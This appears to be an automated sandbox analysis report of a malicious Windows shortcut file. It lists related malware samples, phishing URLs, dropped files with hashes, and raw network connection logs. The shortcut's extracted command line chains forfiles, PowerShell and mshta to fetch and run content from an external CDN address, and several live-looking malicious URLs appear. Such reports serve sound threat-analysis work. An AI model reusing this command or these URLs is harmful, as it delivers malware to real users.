      SPIRITTEL-ASUS12TtMAeYOD.lnkGet hashmaliciousUnknownBrowse
      • 169.150.236.105
      eodJLLo3Px.lnkGet hashmaliciousUnknownBrowse
      • 169.150.247.38
      PDp2UpMXz1.lnkGet hashmaliciousUnknownBrowse
      • 169.150.247.37
      https://stackby.com/view/vwshr17265453204549a34eaGet hashmaliciousHTMLPhisherBrowse
      • 169.150.247.39
      https://vente-directe-dv.com/Get hashmaliciousUnknownBrowse
      • 169.150.247.39
      https://multichainfix.pages.dev/chunks/patternsGet hashmaliciousUnknownBrowse
      • 169.150.255.183
      https://dpdcz.info8463.com/688687481Get hashmaliciousUnknownBrowse
      • 169.150.255.180
      https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%E2%80%8Bi%C2%ADwa%C2%ADnt%C2%AD2b%C2%ADea.%E2%80%8Bc%C2%ADo%C2%ADm%2Fbuilds%2Fapps%2FvwIz5pvZDUMH3brg4zO3DxEW/bmF0Get hashmaliciousHTMLPhisherBrowse
      • 169.150.255.183
      http://quantmarketfunds.orgGet hashmaliciousUnknownBrowse
      • 169.150.255.181
      Play_VM-Now(Chartering)CQDM.htmlGet hashmaliciousHTMLPhisherBrowse
      • 169.150.247.36
      ORANGE-BUSINESS-SERVICES-IPSN-ASNFRPDp2UpMXz1.lnkGet hashmaliciousUnknownBrowse
      • 138.199.37.232
      https://zone02.b-cdn.net/tra18Get hashmaliciousUnknownBrowse
      • 138.199.37.232
      file_5822aee2333945a68f99cf2cfdd0e024_2024-09-16_14_28_33_034000.zipGet hashmaliciousUnknownBrowse
      • 138.199.18.63
      http://tplshare.com/iVX5CrQGet hashmaliciousUnknownBrowse
      • 138.199.36.8
      https://url.uk.m.mimecastprotect.com/s/mPYbC6R8kf47GAUxtNC5T-0g?domain=tplshare.comGet hashmaliciousHTMLPhisherBrowse
      • 138.199.36.10
      SecuriteInfo.com.Linux.Siggen.9999.5151.15671.elfGet hashmaliciousMiraiBrowse
      • 195.119.219.106
      SecuriteInfo.com.Linux.Siggen.9999.11579.20419.elfGet hashmaliciousMiraiBrowse
      • 57.125.34.251
      http://abhishekch20.github.io/netflix-cloneGet hashmaliciousHTMLPhisherBrowse
      • 138.199.44.209
      ofsetvideofre.click.ps1Get hashmaliciousLummaCBrowse
      • 138.199.36.9
      SecuriteInfo.com.Linux.Siggen.9999.21080.24829.elfGet hashmaliciousMiraiBrowse
      • 57.121.105.75
      SPIRITTEL-ASUS12TtMAeYOD.lnkGet hashmaliciousUnknownBrowse
      • 169.150.236.105
      eodJLLo3Px.lnkGet hashmaliciousUnknownBrowse
      • 169.150.247.38
      PDp2UpMXz1.lnkGet hashmaliciousUnknownBrowse
      • 169.150.247.37
      https://stackby.com/view/vwshr17265453204549a34eaGet hashmaliciousHTMLPhisherBrowse
      • 169.150.247.39
      https://vente-directe-dv.com/Get hashmaliciousUnknownBrowse
      • 169.150.247.39
      https://multichainfix.pages.dev/chunks/patternsGet hashmaliciousUnknownBrowse
      • 169.150.255.183
      https://dpdcz.info8463.com/688687481Get hashmaliciousUnknownBrowse
      • 169.150.255.180
      https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%E2%80%8Bi%C2%ADwa%C2%ADnt%C2%AD2b%C2%ADea.%E2%80%8Bc%C2%ADo%C2%ADm%2Fbuilds%2Fapps%2FvwIz5pvZDUMH3brg4zO3DxEW/bmF0Get hashmaliciousHTMLPhisherBrowse
      • 169.150.255.183
      http://quantmarketfunds.orgGet hashmaliciousUnknownBrowse
      • 169.150.255.181
      Play_VM-Now(Chartering)CQDM.htmlGet hashmaliciousHTMLPhisherBrowse
      • 169.150.247.36
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      37f463bf4616ecd445d4a1937da06e1912TtMAeYOD.lnkGet hashmaliciousUnknownBrowse
      • 169.150.236.104
      • 169.150.247.39
      • 169.150.247.36
      • 138.199.36.7
      • 169.150.247.37
      eodJLLo3Px.lnkGet hashmaliciousUnknownBrowse
      • 169.150.236.104
      • 169.150.247.39
      • 169.150.247.36
      • 138.199.36.7
      • 169.150.247.37
      PDp2UpMXz1.lnkGet hashmaliciousUnknownBrowse
      • 169.150.236.104
      • 169.150.247.39
      • 169.150.247.36
      • 138.199.36.7
      • 169.150.247.37
      SecuriteInfo.com.Win32.MalwareX-gen.8690.29614.exeGet hashmaliciousLummaC, VidarBrowse
      • 169.150.236.104
      • 169.150.247.39
      • 169.150.247.36
      • 138.199.36.7
      • 169.150.247.37
      9poHPPZxlB.exeGet hashmaliciousLummaC Stealer, PureLog Stealer, RedLine, Socks5Systemz, Stealc, Vidar, XmrigBrowse
      • 169.150.236.104
      • 169.150.247.39
      • 169.150.247.36
      • 138.199.36.7
      • 169.150.247.37
      file.exeGet hashmaliciousVidarBrowse
      • 169.150.236.104
      • 169.150.247.39
      • 169.150.247.36
      • 138.199.36.7
      • 169.150.247.37
      Scanned Purchase Copy.vbsGet hashmaliciousFormBook, GuLoaderBrowse
      • 169.150.236.104
      • 169.150.247.39
      • 169.150.247.36
      • 138.199.36.7
      • 169.150.247.37
      Faktura_VAT__U2409161195150793564#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
      • 169.150.236.104
      • 169.150.247.39
      • 169.150.247.36
      • 138.199.36.7
      • 169.150.247.37
      SOLICITUD DE PRESUPUESTO 09-16-2024#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
      • 169.150.236.104
      • 169.150.247.39
      • 169.150.247.36
      • 138.199.36.7
      • 169.150.247.37
      Document BT24#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
      • 169.150.236.104
      • 169.150.247.39
      • 169.150.247.36
      • 138.199.36.7
      • 169.150.247.37
      No context
      Process:C:\Windows\System32\svchost.exe
      File Type:data
      Category:dropped
      Size (bytes):1310720
      Entropy (8bit):0.8021988604331967
      Encrypted:false
      SSDEEP:1536:RJszRK0I9i0k0I9wXq0I9UGJC/PQJCmJCovVsnQ9Sii1GY9zOoRXTpMNYpKhvUAz:RJE+Lfki1GjHwU/+vVhWqpq
      MD5:C63F18309CD9DB1790D40F9D1E3054F8
      SHA1:DFB47A0B3EC21E13A760E8CB259F33446C8BEC19
      SHA-256:2AD0118506CA1408D673932932342000871350B401023C92FAA16037444D0DD6
      SHA-512:79C32C86BEFDD135B66DC959AC41CB83823D94BD70134542605461A658C313781A569C6FC856D4E62CA3BA6FFA23DA761DBFA6E95FA4AADDEDA5E2CC8F709A31
      Malicious:false
      Reputation:low
      Preview:..Q^........@..@.....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.....................................3~L.#.........`h.................h.......1.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................
      Process:C:\Windows\System32\svchost.exe
      File Type:Extensible storage engine DataBase, version 0x620, checksum 0x79bb6459, page size 16384, DirtyShutdown, Windows version 10.0
      Category:dropped
      Size (bytes):1048576
      Entropy (8bit):0.9433494242727756
      Encrypted:false
      SSDEEP:1536:7SB2ESB2SSjlK/ZvxPXK0I9XGJCTgzZYkr3g16zV2UPkLk+kY+lKuy9ny5zPOZ15:7azaHvxXy2V2UR
      MD5:BDBB859B893B17E7C62269EDB1FB5D90
      SHA1:CFDB35BDBCE91E7A3C55C0ED11780E64C04FE43A
      SHA-256:B4052B9E750D43302C329B718BC77D204CE220514B9038E1C17ED588681E552F
      SHA-512:0CA80534BDC524083DDF4F8C98F31BD9D59B8F2A498D0D49261EE6C17191B4FC540F46B3735AF64A653647A13FD3EBAB72F54B5D9836B1D268322F5C7C3A5886
      Malicious:false
      Reputation:low
      Preview:y.dY... ...............X\...;...{......................0.x...... ...{s......|..h.z.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ............{...............................................................................................................................................................................................2...{...........................................|..................h.j5.....|...........................#......h.z.....................................................................................................................................................................................................................................................................................................................................................
      Process:C:\Windows\System32\svchost.exe
      File Type:data
      Category:dropped
      Size (bytes):16384
      Entropy (8bit):0.08110311438494848
      Encrypted:false
      SSDEEP:3:dc/8YeYyzFvsl/nqlFcl1ZUllllaZD/tallGBnX/l/Tj/k7/t:+UzvzVsl/qlFclQ/lsZDQ254
      MD5:C201F4E1A3722A4089925C47DD5CFD03
      SHA1:380116359CFD7E85C3A30523867406A374AB76CE
      SHA-256:D320D8D11B47F6401B473757A85026AA05B8087410C002188FBA71E95D90E276
      SHA-512:AAAA7BD93AB3C2DBD2427EB2116E7FAAFDEC1D919CAE2E3BD0DAE0A81DDE3E479135549CAFB6771221C4483FEDA3AD2E9C70006162D33680570E5F012E1E6E57
      Malicious:false
      Reputation:low
      Preview:........................................;...{.......|... ...{s.......... ...{s.. ...{s.P.... ...{s.................h.j5.....|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
      Process:C:\Windows\System32\mshta.exe
      File Type:data
      Category:dropped
      Size (bytes):49120
      Entropy (8bit):0.0017331682157558962
      Encrypted:false
      SSDEEP:3:Ztt:T
      MD5:0392ADA071EB68355BED625D8F9695F3
      SHA1:777253141235B6C6AC92E17E297A1482E82252CC
      SHA-256:B1313DD95EAF63F33F86F72F09E2ECD700D11159A8693210C37470FCB84038F7
      SHA-512:EF659EEFCAB16221783ECB258D19801A1FF063478698CF4FCE3C9F98059CA7B1D060B0449E6FD89D3B70439D9735FA1D50088568FF46C9927DE45808250AEC2E
      Malicious:false
      Reputation:moderate, very likely benign file
      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
      Process:C:\Windows\System32\mshta.exe
      File Type:HTML document, ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):162
      Entropy (8bit):4.43530643106624
      Encrypted:false
      SSDEEP:3:qVoB3tUROGclXqyvXboAcMBXqWSZUXqXlIVLLP61IwcWWGu:q43tISl6kXiMIWSU6XlI5LP8IpfGu
      MD5:4F8E702CC244EC5D4DE32740C0ECBD97
      SHA1:3ADB1F02D5B6054DE0046E367C1D687B6CDF7AFF
      SHA-256:9E17CB15DD75BBBD5DBB984EDA674863C3B10AB72613CF8A39A00C3E11A8492A
      SHA-512:21047FEA5269FEE75A2A187AA09316519E35068CB2F2F76CFAF371E5224445E9D5C98497BD76FB9608D2B73E9DAC1A3F5BFADFDC4623C479D53ECF93D81D3C9F
      Malicious:false
      Reputation:moderate, very likely benign file
      Preview:<html>..<head><title>301 Moved Permanently</title></head>..<body>..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx</center>..</body>..</html>..
      Process:C:\Windows\System32\mshta.exe
      File Type:ASCII text, with very long lines (585)
      Category:dropped
      Size (bytes):14730
      Entropy (8bit):5.3721449541825255
      Encrypted:false
      SSDEEP:384:w3XldBpKXld2t1XldjoYmTXldFcBXldXr:Qcs0Y7
      MD5:A73A766B864B8AC951E8D389A09F571E
      SHA1:301C78FB5A4A7048FA15CAAC0837D920590701FB
      SHA-256:1DD5CAD50B5EA0168C7505759936C12E813DF7B1DC3AB1FE09057DCC6A230A1A
      SHA-512:728D7B08D26CD9144849C37387EF9F82107CA2B2627C738E7C50C40E64EE250BE83750B7B3580498A00F4C6DF507D97FDD014050065FFEB1ECFA8C7C160F0DD5
      Malicious:false
      Preview:/* latin */.@font-face {. font-family: 'Rubik';. font-style: normal;. font-weight: 300;. font-stretch: 100%;. src: url(https://fonts.bunny.net/rubik/files/rubik-latin-300-normal.woff2) format('woff2'), url(https://fonts.bunny.net/rubik/files/rubik-latin-300-normal.woff) format('woff'); . unicode-range: U+0000-00FF,U+0131,U+0152-0153,U+02BB-02BC,U+02C6,U+02DA,U+02DC,U+0304,U+0308,U+0329,U+2000-206F,U+2074,U+20AC,U+2122,U+2191,U+2193,U+2212,U+2215,U+FEFF,U+FFFD;.}../* arabic */.@font-face {. font-family: 'Rubik';. font-style: normal;. font-weight: 300;. font-stretch: 100%;. src: url(https://fonts.bunny.net/rubik/files/rubik-arabic-300-normal.woff2) format('woff2'), url(https://fonts.bunny.net/rubik/files/rubik-arabic-300-normal.woff) format('woff'); . unicode-range: U+0600-06FF,U+0750-077F,U+0870-088E,U+0890-0891,U+0898-08E1,U+08E3-08FF,U+200C-200E,U+2010-2011,U+204F,U+2E41,U+FB50-FDFF,U+FE70-FE74,U+FE76-FEFC,U+102E0-102FB,U+10E60-10E7E,U+10EFD-10EFF,U+1EE00-1EE03,U+1EE05-1EE
      Process:C:\Windows\System32\mshta.exe
      File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
      Category:dropped
      Size (bytes):1199
      Entropy (8bit):4.770650869864007
      Encrypted:false
      SSDEEP:24:2ewi3f52QWO9sc5q34FbYjDDLsU4q3kbVsf:zwy5dJ9abQU4O
      MD5:BCD513F96F90A8FAF900204B70DC613E
      SHA1:FD30788A66007388CE903897D209B08B71F21958
      SHA-256:4BC3C5D7883A5534747905A39587BED66270E890DEE05A341DA99F54F507F137
      SHA-512:EF5AC7DDA552F31FD9938BFD7F668D283DB8583B83B366F51A4613D5835B61DD7ED3BBEDBD67176F34F647CB7E0A0E8BDBD5A4B5912937ABB2D0E33BA9D07198
      Malicious:false
      Preview:.html, body {.. width: 100%;.. margin: 0;.. padding: 0;.. text-align: center;.. font-family: 'Rubik';.. background-image: url(https://bunnycdn.com/assets/v2/images/general/il-bg-black-flower.svg);.. background-repeat: no-repeat;.. background-position: bottom center;.. background-size: cover;.. color: white;.. height: 100%;.. background-color: #051f37;..}....#header {.. padding-top: 70px;.. width: 100%;.. margin-bottom: 70px;..}....#content {.. width: 100%;.. max-width: 1060px;.. margin-left: auto;.. margin-right: auto;.. text-align: center;.. margin-top: 30px;..}....#footer {.. margin-top: 20px;..}....h1 {.. font-weight: 400;.. display: inline-block;.. margin: 0 0 0 20px;.. padding: 0;.. color: white;.. line-height: 56px;.. font-size: 30px;.. vertical-align: middle;..}....h2 {.. margin-bottom: 0px;.. font-weight: bold;.. font-size: 45px;.. margin-bottom: 40px;..}....p {.. width: 7
      Process:C:\Windows\System32\mshta.exe
      File Type:SVG Scalable Vector Graphics image
      Category:dropped
      Size (bytes):7267
      Entropy (8bit):4.685839253067166
      Encrypted:false
      SSDEEP:192:0e1eypkHIpqzDKedoYZJbmVUzlTywEjMXEW4eI+A:RezuuKooVVq5ydW4N
      MD5:7EB260859AB0192CC38348CA805372C0
      SHA1:57CC83A36EBE6FD660AB6D513D6BCAA689CA77A4
      SHA-256:EDC81818851D1A7F30F896CEB6352389D3DFF1A57599BE7B5AFF31D70155ABBD
      SHA-512:A0FCB6D8853AD16D06EB860BAD45E83AE1E0B4465FDA3A0830CF5C4BE78D93D1131F750C2806E0192943B9183D242D1B7474DCA8B0074D517B64D388F510354F
      Malicious:false
      Preview:<?xml version="1.0" encoding="UTF-8"?>..<svg width="2880px" height="1424px" viewBox="0 0 2880 1424" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">.. Generator: Sketch 52.5 (67469) - http://www.bohemiancoding.com/sketch -->.. <title>Group 34</title>.. <desc>Created with Sketch.</desc>.. <defs>.. <radialGradient cx="48.4540422%" cy="27.0119645%" fx="48.4540422%" fy="27.0119645%" r="70.8708514%" gradientTransform="translate(0.484540,0.270120),scale(0.494444,1.000000),rotate(90.000000),translate(-0.484540,-0.270120)" id="radialGradient-1">.. <stop stop-color="#002649" offset="0%"></stop>.. <stop stop-color="#051F37" offset="100%"></stop>.. </radialGradient>.. <rect id="path-2" x="0" y="0" width="2880" height="1424"></rect>.. </defs>.. <g id="Page-1" stroke="none" stroke-width="1" fill="none" fill-rule="evenodd">.. <g id="Homepage-Copy" transform="translate(0.000000, -5295.
      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      File Type:data
      Category:dropped
      Size (bytes):64
      Entropy (8bit):0.773832331134527
      Encrypted:false
      SSDEEP:3:Nlllul:NllU
      MD5:16CD248E7DE27479D8EA6DC76E4D1E05
      SHA1:2598E92B97E6F812DE30A2099546BFC3CE418383
      SHA-256:4DCCC50A6CC980CA3CAB2FECCBA6A11C8B523E6E1C0096E4EB6754B7DA417254
      SHA-512:F7E19DA3C0194863470860B49073F6FAC8F5D3BC801F3EBC230BBFD05E16FF9A950F68FF14CF55C59C491B008C9666600D3817E1220100BFD669482AF9235B50
      Malicious:false
      Preview:@...e.................................X.........................
      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      File Type:ASCII text, with no line terminators
      Category:dropped
      Size (bytes):60
      Entropy (8bit):4.038920595031593
      Encrypted:false
      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
      MD5:D17FE0A3F47BE24A6453E9EF58C94641
      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
      Malicious:false
      Preview:# PowerShell test file to determine AppLocker lockdown mode
      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      File Type:ASCII text, with no line terminators
      Category:dropped
      Size (bytes):60
      Entropy (8bit):4.038920595031593
      Encrypted:false
      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
      MD5:D17FE0A3F47BE24A6453E9EF58C94641
      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
      Malicious:false
      Preview:# PowerShell test file to determine AppLocker lockdown mode
      Process:C:\Windows\System32\svchost.exe
      File Type:JSON data
      Category:dropped
      Size (bytes):55
      Entropy (8bit):4.306461250274409
      Encrypted:false
      SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
      MD5:DCA83F08D448911A14C22EBCACC5AD57
      SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
      SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
      SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
      Malicious:false
      Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
      File type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has command line arguments, Icon number=115, Archive, ctime=Sat May 8 07:13:59 2021, mtime=Sat May 8 07:13:59 2021, atime=Sat May 8 07:13:59 2021, length=41472, window=hidenormalshowminimized
      Entropy (8bit):4.490108262249386
      TrID:
      • Windows Shortcut (20020/1) 100.00%
      File name:8t6beMY1wO.lnk
      File size:1'134 bytes
      MD5:50e161c24d2f447015cae82cccaf4885
      SHA1:f4f7fa40c75d74e22df41b1916893b514c54e384
      SHA256:4a37a2af26ce9de3b828c5a92320bbefa6e91b6f1a4ad67c4f701729c0ff92eb
      SHA512:61d09e29ae77852fa70a9e9cc9a8e693e9356f9ec9e1ca9854358fdef92a9fd2bb02317b444934ee27950cf44133846b489764a7f16f49ca4233e8e3d2620c65
      SSDEEP:24:8faXMmPd4vd4pyA62Pkw+/4t+0F6xZAaP1y/1lYdsW2mt:8facm1Udu6oZ+AbLGsW2U
      TLSH:C521102513DF1F30D2F38B396CB66B13BA39BC05FA23AF2E414065540821612B8B4F3A
      File Content Preview:L..................F.... ...p.V..C..p.V..C..p.V..C......s...................E....P.O. .:i.....+00.../C:\...................V.1......X.)..Windows.@........R.@.X.)..........................aTF.W.i.n.d.o.w.s.....Z.1......X.:..System32..B........R.@.X.:......
      Icon Hash:e0f8ecdcdcf9eded

      General

      Relative Path:..\..\..\Windows\System32\forfiles.exe
      Command Line Argument:/p C:\Windows /m win.ini /c "powershell . mshta https://vidstreemz.b-cdn.net/nexto"
      Icon location:shell32.dll
      TimestampSource PortDest PortSource IPDest IP
      Sep 17, 2024 09:23:08.834850073 CEST49704443192.168.2.8138.199.36.7
      Sep 17, 2024 09:23:08.834882975 CEST44349704138.199.36.7192.168.2.8
      Sep 17, 2024 09:23:08.834970951 CEST49704443192.168.2.8138.199.36.7
      Sep 17, 2024 09:23:08.864068985 CEST49704443192.168.2.8138.199.36.7
      Sep 17, 2024 09:23:08.864089966 CEST44349704138.199.36.7192.168.2.8
      Sep 17, 2024 09:23:09.985745907 CEST44349704138.199.36.7192.168.2.8
      Sep 17, 2024 09:23:09.985893011 CEST49704443192.168.2.8138.199.36.7
      Sep 17, 2024 09:23:10.038057089 CEST49704443192.168.2.8138.199.36.7
      Sep 17, 2024 09:23:10.038074017 CEST44349704138.199.36.7192.168.2.8
      Sep 17, 2024 09:23:10.038438082 CEST44349704138.199.36.7192.168.2.8
      Sep 17, 2024 09:23:10.038507938 CEST49704443192.168.2.8138.199.36.7
      Sep 17, 2024 09:23:10.040709972 CEST49704443192.168.2.8138.199.36.7
      Sep 17, 2024 09:23:10.083445072 CEST44349704138.199.36.7192.168.2.8
      Sep 17, 2024 09:23:10.262312889 CEST44349704138.199.36.7192.168.2.8
      Sep 17, 2024 09:23:10.262389898 CEST44349704138.199.36.7192.168.2.8
      Sep 17, 2024 09:23:10.262403965 CEST49704443192.168.2.8138.199.36.7
      Sep 17, 2024 09:23:10.262435913 CEST49704443192.168.2.8138.199.36.7
      Sep 17, 2024 09:23:10.265062094 CEST49704443192.168.2.8138.199.36.7
      Sep 17, 2024 09:23:10.265083075 CEST44349704138.199.36.7192.168.2.8
      Sep 17, 2024 09:23:10.280630112 CEST4970580192.168.2.8169.150.236.104
      Sep 17, 2024 09:23:10.282802105 CEST49706443192.168.2.8169.150.247.37
      Sep 17, 2024 09:23:10.282851934 CEST44349706169.150.247.37192.168.2.8
      Sep 17, 2024 09:23:10.282954931 CEST49706443192.168.2.8169.150.247.37
      Sep 17, 2024 09:23:10.283127069 CEST49706443192.168.2.8169.150.247.37
      Sep 17, 2024 09:23:10.283144951 CEST44349706169.150.247.37192.168.2.8
      Sep 17, 2024 09:23:10.285486937 CEST8049705169.150.236.104192.168.2.8
      Sep 17, 2024 09:23:10.285546064 CEST4970580192.168.2.8169.150.236.104
      Sep 17, 2024 09:23:10.285645962 CEST4970580192.168.2.8169.150.236.104
      Sep 17, 2024 09:23:10.290416956 CEST8049705169.150.236.104192.168.2.8
      Sep 17, 2024 09:23:10.396065950 CEST49707443192.168.2.8169.150.247.39
      Sep 17, 2024 09:23:10.396087885 CEST44349707169.150.247.39192.168.2.8
      Sep 17, 2024 09:23:10.396238089 CEST49707443192.168.2.8169.150.247.39
      Sep 17, 2024 09:23:10.396545887 CEST49707443192.168.2.8169.150.247.39
      Sep 17, 2024 09:23:10.396560907 CEST44349707169.150.247.39192.168.2.8
      Sep 17, 2024 09:23:10.796505928 CEST8049705169.150.236.104192.168.2.8
      Sep 17, 2024 09:23:10.796649933 CEST4970580192.168.2.8169.150.236.104
      Sep 17, 2024 09:23:10.856457949 CEST49708443192.168.2.8169.150.236.104
      Sep 17, 2024 09:23:10.856491089 CEST44349708169.150.236.104192.168.2.8
      Sep 17, 2024 09:23:10.856564045 CEST49708443192.168.2.8169.150.236.104
      Sep 17, 2024 09:23:10.858674049 CEST49708443192.168.2.8169.150.236.104
      Sep 17, 2024 09:23:10.858689070 CEST44349708169.150.236.104192.168.2.8
      Sep 17, 2024 09:23:11.335139036 CEST44349706169.150.247.37192.168.2.8
      Sep 17, 2024 09:23:11.335203886 CEST49706443192.168.2.8169.150.247.37
      Sep 17, 2024 09:23:11.339109898 CEST49706443192.168.2.8169.150.247.37
      Sep 17, 2024 09:23:11.339121103 CEST44349706169.150.247.37192.168.2.8
      Sep 17, 2024 09:23:11.339376926 CEST44349706169.150.247.37192.168.2.8
      Sep 17, 2024 09:23:11.339420080 CEST49706443192.168.2.8169.150.247.37
      Sep 17, 2024 09:23:11.341738939 CEST44349707169.150.247.39192.168.2.8
      Sep 17, 2024 09:23:11.341793060 CEST49707443192.168.2.8169.150.247.39
      Sep 17, 2024 09:23:11.344124079 CEST49706443192.168.2.8169.150.247.37
      Sep 17, 2024 09:23:11.349436998 CEST49707443192.168.2.8169.150.247.39
      Sep 17, 2024 09:23:11.349451065 CEST44349707169.150.247.39192.168.2.8
      Sep 17, 2024 09:23:11.349708080 CEST44349707169.150.247.39192.168.2.8
      Sep 17, 2024 09:23:11.349756002 CEST49707443192.168.2.8169.150.247.39
      Sep 17, 2024 09:23:11.350044012 CEST49707443192.168.2.8169.150.247.39
      Sep 17, 2024 09:23:11.391407967 CEST44349707169.150.247.39192.168.2.8
      Sep 17, 2024 09:23:11.391413927 CEST44349706169.150.247.37192.168.2.8
      Sep 17, 2024 09:23:11.475804090 CEST44349708169.150.236.104192.168.2.8
      Sep 17, 2024 09:23:11.475917101 CEST49708443192.168.2.8169.150.236.104
      Sep 17, 2024 09:23:11.479204893 CEST49708443192.168.2.8169.150.236.104
      Sep 17, 2024 09:23:11.479212046 CEST44349708169.150.236.104192.168.2.8
      Sep 17, 2024 09:23:11.479475975 CEST44349708169.150.236.104192.168.2.8
      Sep 17, 2024 09:23:11.479527950 CEST49708443192.168.2.8169.150.236.104
      Sep 17, 2024 09:23:11.479832888 CEST49708443192.168.2.8169.150.236.104
      Sep 17, 2024 09:23:11.523402929 CEST44349708169.150.236.104192.168.2.8
      Sep 17, 2024 09:23:11.608494997 CEST44349708169.150.236.104192.168.2.8
      Sep 17, 2024 09:23:11.608593941 CEST49708443192.168.2.8169.150.236.104
      Sep 17, 2024 09:23:11.608606100 CEST44349708169.150.236.104192.168.2.8
      Sep 17, 2024 09:23:11.608649969 CEST49708443192.168.2.8169.150.236.104
      Sep 17, 2024 09:23:11.614171028 CEST44349708169.150.236.104192.168.2.8
      Sep 17, 2024 09:23:11.614178896 CEST44349708169.150.236.104192.168.2.8
      Sep 17, 2024 09:23:11.614207029 CEST44349708169.150.236.104192.168.2.8
      Sep 17, 2024 09:23:11.614237070 CEST44349708169.150.236.104192.168.2.8
      Sep 17, 2024 09:23:11.614269972 CEST49708443192.168.2.8169.150.236.104
      Sep 17, 2024 09:23:11.614331007 CEST49708443192.168.2.8169.150.236.104
      Sep 17, 2024 09:23:11.618753910 CEST44349706169.150.247.37192.168.2.8
      Sep 17, 2024 09:23:11.618819952 CEST49706443192.168.2.8169.150.247.37
      Sep 17, 2024 09:23:11.618844032 CEST44349706169.150.247.37192.168.2.8
      Sep 17, 2024 09:23:11.618870974 CEST44349706169.150.247.37192.168.2.8
      Sep 17, 2024 09:23:11.618887901 CEST49706443192.168.2.8169.150.247.37
      Sep 17, 2024 09:23:11.618912935 CEST49706443192.168.2.8169.150.247.37
      Sep 17, 2024 09:23:11.620835066 CEST49708443192.168.2.8169.150.236.104
      Sep 17, 2024 09:23:11.620852947 CEST44349708169.150.236.104192.168.2.8
      Sep 17, 2024 09:23:11.624769926 CEST49706443192.168.2.8169.150.247.37
      Sep 17, 2024 09:23:11.624785900 CEST44349706169.150.247.37192.168.2.8
      Sep 17, 2024 09:23:11.791177988 CEST49709443192.168.2.8169.150.247.36
      Sep 17, 2024 09:23:11.791213989 CEST44349709169.150.247.36192.168.2.8
      Sep 17, 2024 09:23:11.791286945 CEST49709443192.168.2.8169.150.247.36
      Sep 17, 2024 09:23:11.791563034 CEST49709443192.168.2.8169.150.247.36
      Sep 17, 2024 09:23:11.791578054 CEST44349709169.150.247.36192.168.2.8
      Sep 17, 2024 09:23:12.543171883 CEST44349709169.150.247.36192.168.2.8
      Sep 17, 2024 09:23:12.543246031 CEST49709443192.168.2.8169.150.247.36
      Sep 17, 2024 09:23:12.546761990 CEST49709443192.168.2.8169.150.247.36
      Sep 17, 2024 09:23:12.546773911 CEST44349709169.150.247.36192.168.2.8
      Sep 17, 2024 09:23:12.547059059 CEST44349709169.150.247.36192.168.2.8
      Sep 17, 2024 09:23:12.547102928 CEST49709443192.168.2.8169.150.247.36
      Sep 17, 2024 09:23:12.547437906 CEST49709443192.168.2.8169.150.247.36
      Sep 17, 2024 09:23:12.595407009 CEST44349709169.150.247.36192.168.2.8
      Sep 17, 2024 09:23:12.825297117 CEST44349709169.150.247.36192.168.2.8
      Sep 17, 2024 09:23:12.825318098 CEST44349709169.150.247.36192.168.2.8
      Sep 17, 2024 09:23:12.825408936 CEST49709443192.168.2.8169.150.247.36
      Sep 17, 2024 09:23:12.825429916 CEST44349709169.150.247.36192.168.2.8
      Sep 17, 2024 09:23:12.825479984 CEST49709443192.168.2.8169.150.247.36
